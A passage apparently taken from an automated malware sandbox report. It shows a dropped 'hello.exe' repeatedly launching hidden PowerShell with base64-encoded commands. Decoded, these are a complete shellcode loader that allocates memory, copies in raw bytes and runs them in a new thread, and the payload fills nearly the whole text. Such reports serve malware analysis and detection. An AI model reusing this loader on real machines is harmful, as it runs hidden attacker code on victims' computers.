DkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:4296

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:8828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:9092

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:9124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAs